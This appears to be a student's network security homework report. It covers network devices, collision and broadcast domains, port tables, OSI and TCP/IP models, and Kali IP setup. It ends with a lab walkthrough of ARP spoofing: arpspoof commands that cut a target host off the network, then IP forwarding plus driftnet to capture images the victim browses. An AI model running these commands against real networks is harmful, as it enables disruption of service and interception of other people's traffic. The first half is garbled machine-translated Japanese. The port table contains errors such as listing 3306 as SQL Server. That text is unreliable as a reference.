宿題
王元缶
2020年1月11日
@雨男ネットワークセキュリティ
仕事
ジョブの開始
1.仕事の概要
- どのようにネットワーク機器を動作します
- ポート
- コンピュータネットワークモデル
- コンピュータネットワークプロトコル
- カーリーのIPアドレスの設定
2.仕事の分析
2.1ブリッジ、ルータのレイヤ2スイッチ機能との違い、ブロードキャストドメインとコリジョンドメインは、これらの作品の機器を説明します
よりよい各デバイス、並びにそれらの機能の違いの原則を理解するために、今すぐコンピュータネットワーク機器の概要の概要のすべてのレベルのために、物理層デバイスからの分析を開始します。
- リピータ(RPリピータ)&ハブ(ハブ)
リピータ
1.どのようなリレーである:ネットワーク回線に接続された中継装置、及び再生信号がネットワークデバイスを減少させます。
2.中継の役割:信号電力線の損失の存在が徐々にしたがって、受信エラーの原因、伝送路、ある程度減衰による信号歪みに伴って減少します。リピータは、この問題とデザインを解決することです。その接続を完了するための物理回線、信号の減衰が増幅され、元のデータが同じままです。
3.リピータ機能:リレーがで運転される物理層のためのデバイス二つの同一のネットワーク相互接続されたネットワーク・ノード2つの一般的な言語間の双方向転送作業物理的信号。
4.リピーターデメリット
利点
- 通信距離を展開します。
- これは、ノードの最大数を増加させます。
- 各セグメントは、異なる通信速度を使用することができます。
- ネットワークに障害が発生した信頼性の向上は、一般的にのみ個々のセグメントに影響を与えます。
簡単なリレーの主な利点は、使いやすく、インストールするには、比較的安価である:PS。ネットワーク距離と、彼だけでなく、機能は、また、ネットワークの異なる伝送媒体に一緒に接続することができます。中継器は、物理層で動作し、高レベルのプロトコルは完全に透明です。
短所
- 以来、信号を受信するリピータは、送信の状態(復元)減衰再生、及び、遅延増加を転送します。
- MAC副層CANバスとフロー制御なし。ネットワーク上の場合、重負荷、リピータは、バッファメモリのオーバーフロー空間の不足に起因することができるので、失われるフレームを生成するように、発生します。
- リピータ失敗した場合、隣接する二つのサブネットの作品に影響を与えます。
5.リピータ「トゥルーカラー」
図リピーター2.1
図のリレーの図2.2応用。
ハブ
1.ハブは何か:ハブはマルチポートリピータは、純粋にハードウェアデバイスのネットワークインフラストラクチャです
2.ハブ機能:ハブの主な機能は、再生された受信信号整形、伝送距離を拡大するために増幅されたノード上に中心を持つクラスタ内のすべてのノードがあります。
3.ハブの特徴:単にビット(ハブは任意の情報信号、アドレスまたはデータを知らない)であろう各トランシーバへのインタフェースの物理層におけるハブの作業は、衝突検出を行いません。
4.プロセスハブ操作:ライン信号をノード放送受信信号は、ハブは、増幅後の減衰した信号を整形信号伝送ケーブルにおける信号減衰による信号ハブ、受信し、増幅し、最終的に他のすべてのポートにハブに転送。
5.ハブ「トゥルーカラー」
図ハブ2.3
図ハブ構成2.4
-
橋(ブリッジ)
2つのLANストアアンドフォワードデバイスを接続する、ブリッジ、また橋として知られている:橋は何1。
2.ブリッジの役割:ブリッジフレーム転送技術は、MACパーティションブロックによれば、衝突は、それぞれのブリッジセグメントはネットワークデータリンク層において互いに接続されている、単離することができます。
3.ブリッジの特徴:ブリッジはネットワークが2つの類似を接続し、データリンク層で動作し、データ配信ネットワークを管理します。これは、ネットワークのパフォーマンス、信頼性、セキュリティを向上させる、ネットワークの拡張された距離または範囲であることができます。
4. Aブリッジ作品:既存の2つのネットワーク、すなわちネットワーク1,2。1とパケット伝送ネットワークブリッジは、受信ブリッジ接続後にネットワークを介してネットワーク2、アドレスチェックパケット、アドレスはネットワーク2のアドレス場合、逆に、それを放棄するように、ネットワーク1に属する場合には、それ2.ネットワークブリッジそのような分離に続き、ネットワークセグメントの他のユーザへの不正アクセスを防止するために、(同じネットワーク番号に属する)セグメントのネットワーク番号、安全スペーサーセグメントを複数の同一の分割、情報を利用することができます。
橋の長所と短所
利点
- フィルタのトラフィック
- 物理学の範囲を拡大
- あなたは、異なる物理層、異なる配線LANを使用することができます
- 信頼性を向上させます
短所
- 最初に受信したフレームのブリッジとステーションルックアップテーブルを格納し、待ち時間の増加
- いいえフロー制御機能しません
- ユーザーの数が多すぎる(これ以上の数百以上)とローカルエリアネットワークあまり大きくない、あるいは時にはそれ以上のブロードキャストストームを持っている情報の量ではないではないだけのために
6.橋「トゥルーカラー」
図2.5図ブリッジ作業
-
スイッチ(スイッチ)
電気(光)信号転送ネットワークデバイス:1.スイッチは何です。
2.スイッチの役割:スイッチはデータリンク層で動作し、同期データ伝送、増幅及び整形を実現することが可能であり、及びデブリは、ショートフレームをフィルタリングすることができます。衝突ドメインおよびスイッチを単離することは効果的ブロードキャストストームの発生を抑制することができます。
3.スイッチの動作モード:
- STPは:パケットが検出された入力ポートに、チェックパケットヘッダは、パケットの宛先アドレス取得は、内部動的ルックアップテーブルは、入力および出力データ・パケットの交点にオンされ、対応する出力ポートに変換され、開始します機能を切り替えるための各ポートを介し。
- フォワードストアと:格納されたパケットの第1の入力ポート、パケットを送信する出力ポートにルックアップテーブルを介して、CRC(巡回冗長検査)チェック、エラーパケット処理後のパケットの抽出された宛先アドレスが続きます。
- フラグメント:パケットの長さを確認してください64は、パケットが破棄され、64バイト未満の場合は、パケットの記述が虚偽である、十分にバイト、64バイト以上ならば、パケットが送信されます。
-
ルーター(ルーター)
1.どのようなルータです:2以上のネットワークハードウェアデバイスを接続し、ネットワーク間のゲートウェイとしての役割、各パケットの読み出しアドレスを再生すると、どのように転送するには、特定のインテリジェントネットワークデバイスを決定します。
2.ルータの役割:ルーティングアルゴリズムを最適ルートで指定された場所の各々に選択されたパケットに係ります。
3.ルータ機能:ネットワーク層ルータは、典型的には、位置の異なるネットワーク間で格納され、パケット転送処理は、異なる論理ネットワークに分離することができます。
4.ルータの作品は:特定のIPアドレスに基づいてデータを転送します。同ネットワークでは、IPアドレスのネットワークアドレスが同じでなければなりません。通信は、あなたが他のセグメント内のコンピュータと通信したい場合、それは転送ルータを通過する必要があり、コンピュータ間で同一のネットワークアドレスとIPアドレスの間でのみ可能です。異なるネットワークアドレスのIPアドレスが直接通信することはできません、彼らは非常に接近している場合でも、我々は通信できません。複数のポートは、ルータのネットワークセグメントの複数に接続され、各ポートのIPアドレスのネットワークアドレスは、接続されたネットワークセグメントのネットワークアドレスと一致しなければなりません。異なるポートは、そのネットワークアドレスは、対応するセグメント異なる独自のセグメントのIPアドレスにルータを介してデータを送信するホストの各セグメントを作るために、異なっています。
5.ルータ「トゥルーカラー」
図ルータ2.6
図2.7ルータの作業プロセス
-
コリジョンドメイン(衝突Domian)&ブロードキャストドメイン(ブロードキャストドメイン)
コリジョンドメイン
1.什么是冲突域:一个站点向另一个站点发出信号,除目的站点外,有多少站点能收到这个信息,这些站点就构成一个冲突域。(冲突域基于第一层,即物理层)
2.怎样避免冲突:对网络进行分割,分离流量并创建更小的冲突域来使用户或的更高的带宽。
3.冲突域“真颜”
图2.8 集线器下的冲突域
广播域
1.什么是广播域:网络中能接收任一设备发出的广播帧的所有设备的集合(广播域基于第二层,即数据链路层)
2.广播域“真颜”
图2.9 交换机下的广播域
-
常见计算机设备与冲突域、广播域
计算机设备 | 能否隔离冲突域 | 能否隔离广播域 |
中继器 | 不能 | 不能 |
集线器 | 不能 | 不能 |
网桥 | 能 | 不能 |
交换机 | 能 | 不能 |
路由器 | 能 | 能 |
图2.9 中继器与广播域,冲突域
图2.10 集线器与广播域,冲突域
图2.11 网桥与广播域,冲突域
图2.12 交换机与广播域,冲突域
图2.13 路由器与广播域,冲突域
2.2 常见端口表及其运行的服务
- 远程连接服务
Service | Port | Transport Protocol |
Telnet | 23(明文传输,极不安全) | TCP/UDP |
SSH | 22 | TCP/UDP/SCTP |
Windows Remote Desktop | 3389 | TCP |
- 文件传输
Service | Port | Transport Protocol |
TFTP | 69 | UDP |
FTP | 21 | TCP/UDP/SCTP |
SFTP | 115 | TCP/UDP |
Service | Port | Port for SSL | Transport Protocol |
IMAP | 143 | 993 | TCP/UDP |
SMTP | 25 | 994/465 | TCP/UDP |
POP3 | 110 | 995 | TCP |
- Web
Service | Port | Transport Protocol |
HTTP | 80 | TCP/UDP |
HTTPS | 443 | TCP/UDP/SCTP |
HTTP-ALT | 8080 | TCP/UDP |
- 数据库
Service | Port | Transport Protocol |
Mircrosoft SQL Server | TCP 1433 | TCP/UDP |
Mircrosoft SQL Server | TCP 3306 | TCP/UDP/SCTP |
- VPN
Service | Port | Transport Protocol |
PPTP | 1723 | TCP |
L2TP | 1701 | UDP |
IPSec | 500/4500 | UDP |
- 网络
Service | Port | Transport Protocol |
Whois | 43 | TCP/UDP |
Domain Name Server | 53 | TCP/UDP |
Network Time Protocol | 123 | TCP/UDP |
Netbios Name Service | 137/138/139 | TCP/UDP |
Syslog | 514 | UDP |
2.3 计算机网络模型架构分析
典型的OSI七层模型及分析如下图所示,包含了详细的协议解读
2.3.1 OSI七层模型
七层模型,亦称OSI(Open System Interconnection)。该模型是国际标准化组织(ISO)制定的一个用于计算机或通信系统间互联的标准体系,一般称为OSI参考模型或七层模型。
- 物理层:物理层的作用是实现相邻计算机节点之间比特流的透明传送,尽可能屏蔽掉具体传输介质和物理设备的差异。使其上面的数据链路层不必考虑网络的具体传输介质是什么。“透明传送比特流”表示经实际电路传送后的比特流没有发生变化,对传送的比特流来说,这个电路好像是看不见的。
- 数据链路层:在计算机网络中由于各种干扰的存在,物理链路是不可靠的。因此,这一层的主要功能是在物理层提供的比特流的基础上,通过差错控制、流量控制方法,使有差错的物理线路变为无差错的数据链路,即提供可靠的通过物理介质传输数据的方法。该层通常又被分为介质访问控制(MAC)和逻辑链路控制(LLC)两个子层。
- 网络层:通过路由选择算法,为报文或分组通过通信子网选择最适当的路径。该层控制数据链路层与传输层之间的信息转发,建立、维持和终止网络的连接。具体地说,数据链路层的数据在这一层被转换为数据包,然后通过路径选择、分段组合、顺序、进/出路由等控制,将信息从一个网络设备传送到另一个网络设备。
- 传输层:向用户提供可靠的端到端的差错和流量控制,保证报文的正确传输。传输层的作用是向高层屏蔽下层数据通信的细节,即向用户透明地传送报文。该层常见的协议:TCP/IP中的TCP协议、Novell网络中的SPX协议和微软的NetBIOS/NetBEUI协议。传输层提供会话层和网络层之间的传输服务,这种服务从会话层获得数据,并在必要时,对数据进行分割。然后,传输层将数据传递到网络层,并确保数据能正确无误地传送到网络层。因此,传输层负责提供两节点之间数据的可靠传送,当两节点的联系确定之后,传输层则负责监督工作。
- 会话层:向两个实体的表示层提供建立和使用连接的方法。将不同实体之间的表示层的连接称为会话。因此会话层的任务就是组织和协调两个会话进程之间的通信,并对数据交换进行管理。
- 表示层:对来自应用层的命令和数据进行解释,对各种语法赋予相应的含义,并按照一定的格式传送给会话层。其主要功能是“处理用户信息的表示问题,如编码、数据格式转换和加密解密”等。
- 应用层:直接向用户提供服务,完成用户希望在网络上完成的各种工作。它在其他6层工作的基础上,负责完成网络中应用程序与网络操作系统之间的联系,建立与结束使用者之间的联系,并完成网络用户提出的各种网络服务及应用所需的监督、管理和服务等各种协议。
2.3.2 TCP/IP四层模型
第一层:网络接口层
包括用于协作IP数据在已有网络介质上传输的协议。实际上TCP/IP标准并不定义与ISO数据链路层和物理层相对应的功能。相反,它定义像地址解析协议(Address Resolution Protocol,ARP)这样的协议,提供TCP/IP协议的数据结构和实际物理硬件之间的接口。
第二层:网间层
对应于OSI七层参考模型的网络层。本层包含IP协议、RIP协议(Routing Information Protocol,路由信息协议),负责数据的包装、寻址和路由。同时还包含网间控制报文协议(Internet Control Message Protocol,ICMP)用来提供网络诊断信息。
第三层:传输层
对应于OSI七层参考模型的传输层,它提供两种端到端的通信服务。其中TCP协议(Transmission Control Protocol)提供可靠的数据流运输服务,UDP协议(Use Datagram Protocol)提供不可靠的用户数据报服务。
第四层:应用层
对应于OSI七层参考模型的应用层和表达层。因特网的应用层协议包括Finger、Whois、FTP(文件传输协议)、Gopher、HTTP(超文本传输协议)、Telent(远程终端协议)、SMTP(简单邮件传送协议)、IRC(因特网中继会话)、NNTP(网络新闻传输协议)等,
2.3.3 TCP/IP五层模型
五层模型 | 功能 | 每层功能概览 |
在用户空间利用进程交互实现,为应用进程规定并提供相关通信的细节。数据单元:报文 |
针对每个应用的协议: 电子邮件协议->SMTP (client/server模式) 远程登录协议->TELNET (C&S模式) 文件传输协议->FTP、HTTP (超文本协议) |
|
|
管理通信双方两节点间的数据传输,确保数据被可靠地传送到目标地址。传输单位:报文段、用户数据段 |
TCP:面向连接的、可靠的传输 UDP:无连接、最努力的传输 |
|
负责地址管理与路由选择,将运输层产生的报文段加上首部封装成分组(IP数据报),选择合适的路由进行分组交换传送。 传送单位:IP数据报(分组) |
ICMP、IGMP网际协议、IP协议 |
|
负责物理层面节点间互连的数据帧传输,如物理地址寻址(MAX)、数据成帧、流量控制等 (IP数据报加首部成帧)传输单位:帧 |
ARP地址解析协议 帧中继 |
|
提供传输的物理媒介,实现比特流传输。单位:比特 |
RJ-45、RS-232等物理接口协议 |
2.4 计算机网络各层中的协议及其功能
- 应用层: (典型设备:应用程序,如FTP,SMTP ,HTTP)
DHCP(Dynamic Host Configuration Protocol)动态主机分配协议,使用 UDP 协议工作,主要有两个用途:给内部网络或网络服务供应商自动分配 IP 地址,给用户或者内部网络管理员作为对所有计算机作中央管理的手段。实 现即插即用连网。
FTP (File Transfer Protocol)文件传输协议<端口号21>减少或消除不同操作系统下处理文件的不兼容性。
HTTP (Hypertext Transfer Protocol )超文本传输协议 <端口号 80>, 面向事务的应用层协议
SMTP (Simple Mail Transfer Protocol )简单邮件传输协议 <端口号25> 用于发送邮件。
RPC (Remote Procedure Call Protocol )(RFC- 1831)远程过程调用协 议
- 传输层: (典型设备: 进程和端口) 数据单元:数据段 (Segment)
TCP (Transmission Control Protocol )传输控制协议提供可靠的面向连接的服务,传输数据前须先建立连接,结束后释放。可靠的全双工信道。可靠、有序、无丢失、不重复。
UDP (User Datagram Protocol )用户数据报协议发送数据前无需建立连接,不使用拥塞控制,不保证可靠交付,最大努力交付。
网络层: (典型设备:路由器,防火墙、多层交换机) 数据单元:数据包(Packet )
IP (IPv4 · IPv6) (Internet Protocol) 网络之间互连的协议
ARP (Address Resolution Protocol) 即地址解析协议,实现通过IP 地址得 知其物理地址。
RARP (Reverse Address Resolution Protocol)反向地址转换协议允许局域 网的物理机器从网关服务器的 ARP 表或者缓存上请求其 IP地址。
ICMP (Internet Control Message Protocol )Internet 控制报文协议。它是TCP/IP 协议族的一个子协议,用于在IP 主机、路由器之间传递控制消息。
IGMP (Internet Group Management Protocol) Internet 组管理协议,是因特 网协议家族中的一个组播协议,用于 IP 主机向任一个直接相邻的路由器报 告他们的组成员情况。
- 数据链路层: (典型设备: 网卡,网桥,交换机) 数据单元:帧 (Frame)
PPP(Point-to-Ponit Protocol):点对点协议面向字节,由三部分组成:一个将IP 数据报封装到串行链路的方法;一个用于建立、配置和测试数据链路连接的链路控制协议
停止等待协议
CSMA/CD(Carrrier Sense Multiple Access with Collision Detection)载波监听多点接入/碰撞检测协议。总线型网络,协议的实质是载波监听和碰撞检测。载波监听即发数据前先检测总线上是否有其他计算机在发送数据,如暂时不发数据,避免碰撞。碰撞检测为计算机边发送数据边检测信道上的信号电压大小。
ARQ(Automatic Repeat-reQuest )自动重传请求协议,错误纠正协议之一,包括停止等待ARQ 协议和连续ARQ 协议,错误侦测、正面确认、逾时重传与负面确认继以重传等机制。
- 物理层:(典型设备:中继器,集线器、网线、HUB) 数据单元:比特 (Bit)
以太网物理层、调制解调器、PLC 、SONET/SDH 、G.709 、光导纤维、 同轴电缆、双绞线
2.5 kali如何配置静态ip地址
-
打开Kali终端
ps:要在root模式下操作
- 打开网卡的配置文件,路径是/etc/network/interfaces
vim /etc/network/interfaces。
- 对网卡进行静态ip配置
- 配置DNS相关信息
vim /etc/resolv.conf
- 重启网卡
service networking restart
2.6 学习PPT中的内容
2.6.1 ARP断网攻击
- 查看kali虚拟机当前网卡eth0 mac地址,ip地址
ifconfig
- 查看目标机的ip地址
ipconfig
- 通过fping命令,查看当前局域网还存在哪些主机,确定要攻击的主机的ip地址
fping -g 192.168.110.0/24
- 查看攻击前靶机网关的mac地址
arp -a
- 攻击前靶机能正常获取网络数据
ping 8.8.8.8 -t
- 实施断网攻击:arpspoof -i eth0 -t 192.168.110.144 192.168.110.2
arpspoof -i eth0 -t 192.168.110.144 192.168.110.2 //arpspoof -i 网卡 -t 目标ip 网关
靶机显示“连接超时”
靶机的网关mac地址与攻击机相同
2.6.2 内网截获图片
- 设置ip流量转发,不会出现断网现象
echo 1 >/proc/sys/net/ipv4/ip_forward
- 在arp欺骗之前,检查靶机能否上网
- 进行arp欺骗
arpspoof -i eth0 -t 192.168.110.144 192.168.110.2
- 启动drifnet工具,捕获靶机正在浏览的图片
driftnet –i eth0
- 在靶机中打开一个网页。浏览几张图片,并在kali的drifnet窗口中监看
3.思考总结
4.参考资料
- 中继器:https://baike.baidu.com/item/%E4%B8%AD%E7%BB%A7%E5%99%A8/1867747?fr=aladdin
- 集线器与中继器的区别:http://www.kokojia.com/article/25496.html
- 集线器:https://baike.baidu.com/item/%E9%9B%86%E7%BA%BF%E5%99%A8/214614?fr=aladdin
- 网桥:https://baike.baidu.com/item/%E7%BD%91%E6%A1%A5/99310?fr=aladdin
- 路由器:https://baike.baidu.com/item/%E8%B7%AF%E7%94%B1%E5%99%A8/108294?fr=aladdin
- 冲突域:https://baike.baidu.com/item/%E5%86%B2%E7%AA%81%E5%9F%9F/3536608?fr=aladdin
- https://blog.csdn.net/bobozai86/article/details/80342350
- 冲突域与广播域(区别、知识要点):https://blog.csdn.net/lzz_646297826/article/details/53785627
- 常见的服务及端口概览:https://blog.csdn.net/RBPicsdn/article/details/85015705
- 七层模型:https://baike.baidu.com/item/%E4%B8%83%E5%B1%82%E6%A8%A1%E5%9E%8B/1441391?fr=aladdin
- OSI七层模型和TCP/IP模型对应协议(详解):https://blog.csdn.net/qq_41923622/article/details/85805003
- 计算机网络各层协议:https://blog.csdn.net/qq_35660280/article/details/81865800